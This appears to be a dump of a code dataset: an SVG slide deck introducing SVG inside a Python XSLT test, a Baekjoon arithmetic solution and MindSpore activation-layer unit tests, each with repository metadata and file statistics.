slideIndex["slide3-2"] = 9;
]]></script>
<defs>
<linearGradient spreadMethod='pad' id='slideBackgroundPaint' x1='0' y2='768' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideTitleSeparatorPaint' x1='0' y2='0' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
<stop offset='.5' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='menuBarPaint' x1='0' y2='0' x2='210' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideBackgroundHeaderPaint' x1='0' y2='100' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<g id='stripePattern'>
<g style='fill:black; fill-opacity:.25'>
<rect height='2' width='1' y='0'/>
<rect height='2' width='1' y='4'/>
<rect height='2' width='1' y='8'/>
<rect height='2' width='1' y='12'/>
<rect height='2' width='1' y='16'/>
<rect height='2' width='1' y='20'/>
<rect height='2' width='1' y='24'/>
<rect height='2' width='1' y='28'/>
<rect height='2' width='1' y='32'/>
<rect height='2' width='1' y='36'/>
<rect height='2' width='1' y='40'/>
<rect height='2' width='1' y='44'/>
<rect height='2' width='1' y='48'/>
<rect height='2' width='1' y='52'/>
<rect height='2' width='1' y='56'/>
<rect height='2' width='1' y='60'/>
<rect height='2' width='1' y='64'/>
<rect height='2' width='1' y='68'/>
<rect height='2' width='1' y='72'/>
<rect height='2' width='1' y='76'/>
<rect height='2' width='1' y='80'/>
<rect height='2' width='1' y='84'/>
<rect height='2' width='1' y='88'/>
<rect height='2' width='1' y='92'/>
<rect height='2' width='1' y='96'/>
<rect height='2' width='1' y='100'/>
<rect height='2' width='1' y='104'/>
<rect height='2' width='1' y='108'/>
<rect height='2' width='1' y='112'/>
<rect height='2' width='1' y='116'/>
<rect height='2' width='1' y='120'/>
<rect height='2' width='1' y='124'/>
<rect height='2' width='1' y='128'/>
<rect height='2' width='1' y='132'/>
<rect height='2' width='1' y='136'/>
<rect height='2' width='1' y='140'/>
<rect height='2' width='1' y='144'/>
<rect height='2' width='1' y='148'/>
<rect height='2' width='1' y='152'/>
<rect height='2' width='1' y='156'/>
<rect height='2' width='1' y='160'/>
<rect height='2' width='1' y='164'/>
<rect height='2' width='1' y='168'/>
<rect height='2' width='1' y='172'/>
<rect height='2' width='1' y='176'/>
<rect height='2' width='1' y='180'/>
<rect height='2' width='1' y='184'/>
<rect height='2' width='1' y='188'/>
<rect height='2' width='1' y='192'/>
<rect height='2' width='1' y='196'/>
<rect height='2' width='1' y='200'/>
<rect height='2' width='1' y='204'/>
<rect height='2' width='1' y='208'/>
<rect height='2' width='1' y='212'/>
<rect height='2' width='1' y='216'/>
<rect height='2' width='1' y='220'/>
<rect height='2' width='1' y='224'/>
<rect height='2' width='1' y='228'/>
<rect height='2' width='1' y='232'/>
<rect height='2' width='1' y='236'/>
<rect height='2' width='1' y='240'/>
<rect height='2' width='1' y='244'/>
<rect height='2' width='1' y='248'/>
<rect height='2' width='1' y='252'/>
<rect height='2' width='1' y='256'/>
<rect height='2' width='1' y='260'/>
<rect height='2' width='1' y='264'/>
<rect height='2' width='1' y='268'/>
<rect height='2' width='1' y='272'/>
<rect height='2' width='1' y='276'/>
<rect height='2' width='1' y='280'/>
<rect height='2' width='1' y='284'/>
<rect height='2' width='1' y='288'/>
<rect height='2' width='1' y='292'/>
<rect height='2' width='1' y='296'/>
<rect height='2' width='1' y='300'/>
<rect height='2' width='1' y='304'/>
<rect height='2' width='1' y='308'/>
<rect height='2' width='1' y='312'/>
<rect height='2' width='1' y='316'/>
<rect height='2' width='1' y='320'/>
<rect height='2' width='1' y='324'/>
<rect height='2' width='1' y='328'/>
<rect height='2' width='1' y='332'/>
<rect height='2' width='1' y='336'/>
<rect height='2' width='1' y='340'/>
<rect height='2' width='1' y='344'/>
<rect height='2' width='1' y='348'/>
<rect height='2' width='1' y='352'/>
<rect height='2' width='1' y='356'/>
<rect height='2' width='1' y='360'/>
<rect height='2' width='1' y='364'/>
<rect height='2' width='1' y='368'/>
<rect height='2' width='1' y='372'/>
<rect height='2' width='1' y='376'/>
<rect height='2' width='1' y='380'/>
<rect height='2' width='1' y='384'/>
<rect height='2' width='1' y='388'/>
<rect height='2' width='1' y='392'/>
<rect height='2' width='1' y='396'/>
<rect height='2' width='1' y='400'/>
<rect height='2' width='1' y='404'/>
<rect height='2' width='1' y='408'/>
<rect height='2' width='1' y='412'/>
<rect height='2' width='1' y='416'/>
<rect height='2' width='1' y='420'/>
<rect height='2' width='1' y='424'/>
<rect height='2' width='1' y='428'/>
<rect height='2' width='1' y='432'/>
<rect height='2' width='1' y='436'/>
<rect height='2' width='1' y='440'/>
<rect height='2' width='1' y='444'/>
<rect height='2' width='1' y='448'/>
<rect height='2' width='1' y='452'/>
<rect height='2' width='1' y='456'/>
<rect height='2' width='1' y='460'/>
<rect height='2' width='1' y='464'/>
<rect height='2' width='1' y='468'/>
<rect height='2' width='1' y='472'/>
<rect height='2' width='1' y='476'/>
<rect height='2' width='1' y='480'/>
<rect height='2' width='1' y='484'/>
<rect height='2' width='1' y='488'/>
<rect height='2' width='1' y='492'/>
<rect height='2' width='1' y='496'/>
<rect height='2' width='1' y='500'/>
<rect height='2' width='1' y='504'/>
<rect height='2' width='1' y='508'/>
<rect height='2' width='1' y='512'/>
<rect height='2' width='1' y='516'/>
<rect height='2' width='1' y='520'/>
<rect height='2' width='1' y='524'/>
<rect height='2' width='1' y='528'/>
<rect height='2' width='1' y='532'/>
<rect height='2' width='1' y='536'/>
<rect height='2' width='1' y='540'/>
<rect height='2' width='1' y='544'/>
<rect height='2' width='1' y='548'/>
<rect height='2' width='1' y='552'/>
<rect height='2' width='1' y='556'/>
<rect height='2' width='1' y='560'/>
<rect height='2' width='1' y='564'/>
<rect height='2' width='1' y='568'/>
<rect height='2' width='1' y='572'/>
<rect height='2' width='1' y='576'/>
<rect height='2' width='1' y='580'/>
<rect height='2' width='1' y='584'/>
<rect height='2' width='1' y='588'/>
<rect height='2' width='1' y='592'/>
<rect height='2' width='1' y='596'/>
<rect height='2' width='1' y='600'/>
<rect height='2' width='1' y='604'/>
<rect height='2' width='1' y='608'/>
<rect height='2' width='1' y='612'/>
<rect height='2' width='1' y='616'/>
<rect height='2' width='1' y='620'/>
<rect height='2' width='1' y='624'/>
<rect height='2' width='1' y='628'/>
<rect height='2' width='1' y='632'/>
<rect height='2' width='1' y='636'/>
<rect height='2' width='1' y='640'/>
<rect height='2' width='1' y='644'/>
<rect height='2' width='1' y='648'/>
<rect height='2' width='1' y='652'/>
<rect height='2' width='1' y='656'/>
<rect height='2' width='1' y='660'/>
<rect height='2' width='1' y='664'/>
<rect height='2' width='1' y='668'/>
<rect height='2' width='1' y='672'/>
<rect height='2' width='1' y='676'/>
<rect height='2' width='1' y='680'/>
<rect height='2' width='1' y='684'/>
<rect height='2' width='1' y='688'/>
<rect height='2' width='1' y='692'/>
<rect height='2' width='1' y='696'/>
<rect height='2' width='1' y='700'/>
<rect height='2' width='1' y='704'/>
<rect height='2' width='1' y='708'/>
<rect height='2' width='1' y='712'/>
<rect height='2' width='1' y='716'/>
<rect height='2' width='1' y='720'/>
<rect height='2' width='1' y='724'/>
<rect height='2' width='1' y='728'/>
<rect height='2' width='1' y='732'/>
<rect height='2' width='1' y='736'/>
<rect height='2' width='1' y='740'/>
<rect height='2' width='1' y='744'/>
<rect height='2' width='1' y='748'/>
<rect height='2' width='1' y='752'/>
<rect height='2' width='1' y='756'/>
<rect height='2' width='1' y='760'/>
<rect height='2' width='1' y='764'/>
<rect height='2' width='1' y='768'/>
<rect height='2' width='1' y='772'/>
<rect height='2' width='1' y='776'/>
<rect height='2' width='1' y='780'/>
<rect height='2' width='1' y='784'/>
<rect height='2' width='1' y='788'/>
<rect height='2' width='1' y='792'/>
<rect height='2' width='1' y='796'/>
</g>
</g>
<g id='bullet' transform='translate(0, -20)'>
<path style='stroke:white; stroke-width:2; fill:none' d='M0.436,1.418C7.853-1.088,16.396,1.706,19.52,7.658c2.498,4.762-0.287,10.248-6.22,12.252c-4.747,1.604-10.215-0.184-12.213-3.993c-1.599-3.048,0.183-6.559,3.981-7.842c3.038-1.026,6.538,0.118,7.816,2.556 c1.024,1.951-0.117,4.198-2.547,5.019c-1.945,0.657-4.185-0.076-5.003-1.636c-0.655-1.248,0.075-2.686,1.63-3.212c1.245-0.42,2.678,0.048,3.202,1.047'/>
</g>
</defs>
<g id='slideBackground' class='slideBackground'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='668' style='fill:url(#menuBarPaint)' width='210' x='0' y='100'/>
<rect height='100' style='fill:url(#slideBackgroundHeaderPaint)' width='1024' x='0' y='0'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<rect height='5' style='fill:url(#slideTitleSeparatorPaint)' width='1024' x='0' y='100'/>
</g>
<g id='navigationGroup' style='fill:white' transform='translate(984, 45) scale(2, 2)'>
<polygon id='prevSlideControl' onclick='onPrevSlide(evt)' onmouseover="onSetFill(evt, 'prevSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'prevSlideControl', 'white')" transform='rotate(180)'/>
<polygon id='nextSlideControl' onclick='onNextSlide(evt)' onmouseover="onSetFill(evt, 'nextSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'nextSlideControl', 'white')"/>
</g>
<g id='slideMenu' transform='translate(15, 130)'>
<text onclick='onMenuItemSelected(evt, 1)' class='slidesetMenuHeader' x='0' y='0'>Background and Motivation</text>
<g style='visibility:visible'>
<rect height='5' id='Expand1' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu1')" style='fill:white' width='5'/>
<rect height='5' id='Collapse1' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu1')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand1.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand1.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu1'>
<text id='slide1-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide1-1MenuItem')" onclick='onMenuItemSelected(evt, 2)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide1-1MenuItem')" class='slideMenuItem'>Why Yet Another Grap...</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 3)' class='slidesetMenuHeader' x='0' y='0'>The ABCs of SVG</text>
<g style='visibility:visible'>
<rect height='5' id='Expand2' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu2')" style='fill:white' width='5'/>
<rect height='5' id='Collapse2' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu2')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand2.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand2.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu2'>
<text id='slide2-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-1MenuItem')" onclick='onMenuItemSelected(evt, 4)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-1MenuItem')" class='slideMenuItem'>SVG Features</text>
<text id='slide2-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-2MenuItem')" onclick='onMenuItemSelected(evt, 5)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-2MenuItem')" class='slideMenuItem'>SVG Sample Source</text>
<text id='slide2-3MenuItem' x='10' y='60' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-3MenuItem')" onclick='onMenuItemSelected(evt, 6)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-3MenuItem')" class='slideMenuItem'>SVG Sample Output</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 7)' class='slidesetMenuHeader' x='0' y='0'>The SVG Community</text>
<g style='visibility:visible'>
<rect height='5' id='Expand3' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu3')" style='fill:white' width='5'/>
<rect height='5' id='Collapse3' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu3')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand3.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse3.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand3.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu3'>
<text id='slide3-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-1MenuItem')" onclick='onMenuItemSelected(evt, 8)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-1MenuItem')" class='slideMenuItem'>Some SVG Resources</text>
<text id='slide3-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide3-2MenuItem')" onclick='onMenuItemSelected(evt, 9)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide3-2MenuItem')" class='slideMenuItem'>Quote Them on it</text>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand2.click' to='0, 60'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse2.click' to='0, -60'/>
</g>
</g>
<animateTransform fill='freeze' id='translator' type='translate' from='0, 0' dur='1s' accumulate='none' attributeName='transform' attributeType='XML' additive='replace' begin='Expand1.click' to='0, 20'/>
<animateTransform fill='freeze' id='translator2' type='translate' from='0, 0' dur='1s' accumulate='sum' attributeName='transform' attributeType='XML' additive='sum' begin='Collapse1.click' to='0, -20'/>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slideShowCover'>
<defs>
<linearGradient spreadMethod='pad' id='backgroundPaint' x1='0' y2='768' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='25%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='50%' style='stop-color:white; stop-opacity:1;'/>
<stop offset='75%' style='stop-color:rgb(103, 103, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:black; stop-opacity:1;'/>
</linearGradient>
<filter height='105%' id='dropShadow' filterUnits='objectBoundingBox' x='0%' width='105%' y='0%'>
<feGaussianBlur in='SourceAlpha' result='blur' stdDeviation='4'/>
<feOffset dy='4' dx='4' result='offsetBlur' in='blur'/>
<feFlood style='flood-color:black' result='solidBlack'/>
<feComposite in='solidBlack' in2='SourceAlpha' result='separation' operator='in'/>
<feOffset dy='-1' dx='-1' result='offsetSeparation' in='separation'/>
<feMerge>
<feMergeNode in='offsetBlur'/>
<feMergeNode in='offsetSeparation'/>
<feMergeNode in='SourceGraphic'/>
</feMerge>
</filter>
</defs>
<rect height='768' style='fill:url(#backgroundPaint)' width='1024'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<g style='filter:url(#dropShadow)'>
<text class='slideCoverTitle' style='text-anchor:middle' x='512' y='300'>Introduction to SVG</text>
<g transform='translate(512, 490)' id='metadata' style='text-anchor:middle;'>
<text x='0' class='slideCoverSubTitle' y='0'>Uche Ogbuji</text>
<text x='0' class='slideCoverSubTitle' y='50'>Principal Consultant</text>
<text x='0' class='slideCoverSubTitle' y='100'>Fourthought Inc.</text>
<text x='0' class='slideCoverSubTitle' y='150'>Front Range XML Keiretsu</text>
</g>
</g>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover1'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>Background and Motivation</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover2'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The ABCs of SVG</text>
</g>
<g onclick='onNextSlide(evt)' style='visibility:hidden' id='slidesetCover3'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='768' style='fill:url(#menuBarPaint)' width='210' x='0' y='0'/>
<g transform='scale(210, 1)'>
<use xlink:href='#stripePattern'/>
</g>
<text x='240' class='slidesetCoverTitle' y='200'>The SVG Community</text>
</g>
<g id='slide1-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Why Yet Another Graphics Format?</text>
<g><text x="240" y="150" class="itemClass">Leveraging the existing XML technology base</text></g>
<g><text x="240" y="185" class="itemClass">Integrating graphics into the semantic Web</text></g>
<g><text x="240" y="220" class="itemClass">Giving browsers access to image <tspan class='emphasis'>internals</tspan></text></g>
<g><text x="240" y="255" class="itemClass">Supporting the next generation of browsers</text></g>
</g>
<g id='slide2-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Features</text>
<text x='240' class='headingInline' y='150'>Basic Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='185'/>
<g><text x="270" y="185" class="itemClass">Coordinate spaces and transforms</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='220'/>
<g><text x="270" y="220" class="itemClass">Graphics primitives: ellipses, polygons, polylines, curves, etc.</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='255'/>
<g><text x="270" y="255" class="itemClass">Stylesheets: CSS, XSL, etc.</text></g>
<text x='240' class='headingInline' y='290'>Advanced Features</text>
<use class='listBullet' xlink:href='#bullet' x='240' y='325'/>
<g><text x="270" y="325" class="itemClass">Raster filter effects</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='360'/>
<g><text x="270" y="360" class="itemClass">Alpha masking</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='395'/>
<g><text x="270" y="395" class="itemClass">Animation</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='430'/>
<g><text x="270" y="430" class="itemClass">Zooming and Panning</text></g>
<use class='listBullet' xlink:href='#bullet' x='240' y='465'/>
<g><text x="270" y="465" class="itemClass">Scripting and extensibility</text></g>
</g>
<g id='slide2-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Source</text>
<text x='240' class='preformattedInline' y='135'>
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20000802//EN"
"http://www.w3.org/TR/2000/CR-SVG-20000802/DTD/svg-20000802.dtd"
>
<svg width="800" height="800">
<desc>SVG Sample for SunWorld Article</desc>
<style type="text/css">
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: black; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica }
</style>
<ellipse transform="translate(500 200)" rx="250" ry="100"
style="fill: brown; stroke: yellow; stroke-width: 10"/>
<polygon transform="translate(100 200) rotate(45)"
class="Lagos"
points="350,75 379,161 469,161 397,215 423,301 350,250 277,
301 303,215 231,161 321,161"/>
<text class="OrthoLogos" x="400" y="400">TO KALON</text>
<path class="ViaAppia" d="M500,600 C500,500 650,500 650,600
S800,700 800,600"/>
</svg>
</text>
</g>
<g id='slide2-3' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>SVG Sample Output</text>
<g transform='translate(240, 135)'>
<svg height='10cm' width='10cm' viewBox='0 0 200 200'>
<desc>SVG Sample for SunWorld Article</desc>
<style type='text/css'>
.Lagos { fill: white; stroke: green; stroke-width: 30 }
.ViaAppia { fill: none; stroke: white; stroke-width: 10 }
.OrthoLogos { font-size: 32; font-family: helvetica; fill:white }
</style>
<ellipse transform='translate(500 200)' ry='100' rx='250' style='fill: brown; stroke: yellow; stroke-width: 10'/>
<polygon points='350,75 379,161 469,161 397,215 423,301 350,250 277, 301 303,215 231,161 321,161' transform='translate(100 200) rotate(45)' class='Lagos'/>
<text class='OrthoLogos' x='400' y='400'>TO KALON</text>
<path class='ViaAppia' d='M500,600 C500,500 650,500 650,600 S800,700 800,600'/>
</svg>
</g>
</g>
<g id='slide3-1' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Some SVG Resources</text>
<g><text x="240" y="150" class="itemClass"><tspan class='linkStyle'>The W3C's SVG Page</tspan></text></g>
<g><text x="240" y="185" class="itemClass"><tspan class='linkStyle'>OpenDirectory SVG Links</tspan></text></g>
<g><text x="240" y="220" class="itemClass"><tspan class='linkStyle'>How to make slides like these</tspan></text></g>
</g>
<g id='slide3-2' style='visibility:hidden' class='slide'>
<text class='slideTitle' x='30' y='60'>Quote Them on it</text>
<text x='240' class='paraInline' y='150'>"Over twenty organizations, including Sun Microsystems, Adobe, Apple, IBM, and Kodak, have been involved in defining SVG."<tspan class='emphasis'> -- Vincent J. Hardy, Sun</tspan>
</text>
<text x='240' class='paraInline' y='185'>"I have been working with computer graphics for
over 25 years and split an immense amount of blood on the floor at
midnight. With SVG I can now do almost anything I want [except for 3D - in
which I also have a molecular interest]. And I suspect that I can stick
with it for the foreseeable future." <tspan class='emphasis'>-- Peter Murray-Rust, XML-DEV Founder</tspan>
</text>
<text x='240' class='paraInline' y='220'>"I envision a day where we have XHTML Web pages with SVG as the "chrome" of our interfaces--defining the buttons, the layers, the coloring, and the grid--where we can actually use a language that's XML-based rather than theses separate GIF files that can take so long to download. That's certainly one vision; that vision not just extending on the Web, on a monitor, but wireless onto my Palm Pilot or to print and other output as well." <tspan class='emphasis'>-- Steve Mulder, Razorfish</tspan>
</text>
</g>
</svg>"""
#"'
expected_1="""
<svg/>"""
def Test(tester):
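    """Check that the Sun SVG slide toolkit stylesheets are reachable, then run the XSLT test."""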
tester.startTest("Checking for SVG stylesheets")
try:
import urllib
for uri in (sheet_1_uri, sheet_2_uri, sheet_3_uri):
fd = urllib.urlopen(uri)
fd.close()
tester.testDone()
except (IOError, OSError):
tester.warning(
"You must have 'svgslides.xsl', 'svgslides_custom.xsl' and\n"
"'slidescript.xsl' from Sun's SVG toolkit to run this test.\n"
"See http://www.sun.com/software/xml/developers/svg-slidetoolkit/\n"
"or ftp://ftp.fourthought.com/pub/third-party/test-material/\n"
"It's enough to copy *.xsl from that package to the\n"
"'%s' directory." % os.path.dirname(__file__))
tester.testDone()
else:
source = test_harness.FileInfo(uri=source_1_uri)
sheet = test_harness.FileInfo(uri=sheet_1_uri)
test_harness.XsltTest(tester, source, [sheet], expected_1)
return
| 51.010234
| 541
| 0.567367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 34,129
| 0.978161
|
42646da758d7d00689423c6bb8d4edd633b50938
| 232
|
py
|
Python
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 11
|
2020-09-20T15:17:11.000Z
|
2022-03-17T12:43:33.000Z
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 3
|
2021-10-30T07:51:36.000Z
|
2022-03-09T05:19:23.000Z
|
src/2/2338.py
|
youngdaLee/Baekjoon
|
7d858d557dbbde6603fe4e8af2891c2b0e1940c0
|
[
"MIT"
] | 13
|
2021-01-21T03:19:08.000Z
|
2022-03-28T10:44:58.000Z
|
"""
2338. Long Number Calculation
Author: xCrypt0r
Language: Python 3
Memory used: 29,380 KB
Time taken: 72 ms
Solved: September 13, 2020
"""
def main():
A, B = int(input()), int(input())
print(A + B, A - B, A * B, sep='\n')
if __name__ == '__main__':
main()
| 12.888889
| 40
| 0.538793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 165
| 0.580986
|
4264be58cf46729f9ccb094d1db453583943d301
| 2,952
|
py
|
Python
|
tests/ut/python/nn/test_activation.py
|
PowerOlive/mindspore
|
bda20724a94113cedd12c3ed9083141012da1f15
|
[
"Apache-2.0"
] | 3,200
|
2020-02-17T12:45:41.000Z
|
2022-03-31T20:21:16.000Z
|
tests/ut/python/nn/test_activation.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 176
|
2020-02-12T02:52:11.000Z
|
2022-03-28T22:15:55.000Z
|
tests/ut/python/nn/test_activation.py
|
zimo-geek/mindspore
|
665ec683d4af85c71b2a1f0d6829356f2bc0e1ff
|
[
"Apache-2.0"
] | 621
|
2020-03-09T01:31:41.000Z
|
2022-03-30T03:43:19.000Z
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
def __init__(self, dim):
super(SoftmaxNet, self).__init__()
self.softmax = nn.Softmax(dim)
def construct(self, x):
return self.softmax(x)
@non_graph_engine
def test_compile():
net = SoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
@non_graph_engine
def test_compile_axis():
net = SoftmaxNet(-1)
prob = 355
input_data = np.random.randn(4, 16, 1, 1).astype(np.float32) * prob
input_tensor = Tensor(input_data)
net(input_tensor)
class LogSoftmaxNet(nn.Cell):
def __init__(self, dim):
super(LogSoftmaxNet, self).__init__()
self.logsoftmax = nn.LogSoftmax(dim)
def construct(self, x):
return self.logsoftmax(x)
@non_graph_engine
def test_compile_logsoftmax():
net = LogSoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
class Net1(nn.Cell):
def __init__(self):
super(Net1, self).__init__()
self.relu = nn.ReLU()
def construct(self, x):
return self.relu(x)
def test_compile_relu():
net = Net1()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class Net_gelu(nn.Cell):
def __init__(self):
super(Net_gelu, self).__init__()
self.gelu = nn.GELU()
def construct(self, x):
return self.gelu(x)
def test_compile_gelu():
net = Net_gelu()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class NetLeakyReLU(nn.Cell):
def __init__(self, alpha):
super(NetLeakyReLU, self).__init__()
self.leaky_relu = nn.LeakyReLU(alpha)
def construct(self, x):
return self.leaky_relu(x)
def test_compile_leaky_relu():
net = NetLeakyReLU(alpha=0.1)
input_data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
| 27.333333
| 80
| 0.661247
| 966
| 0.327236
| 0
| 0
| 554
| 0.187669
| 0
| 0
| 677
| 0.229336
|
42667a983dfb48f00077636f4ff9f6c3c1fe62f9
| 743
|
py
|
Python
|
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | 1
|
2021-09-16T16:17:58.000Z
|
2021-09-16T16:17:58.000Z
|
sdk/python/tests/integration/feature_repos/universal/data_source_creator.py
|
marsishandsome/feast
|
998e16945da240bfa73570cdb2c5e3639f892d34
|
[
"Apache-2.0"
] | null | null | null |
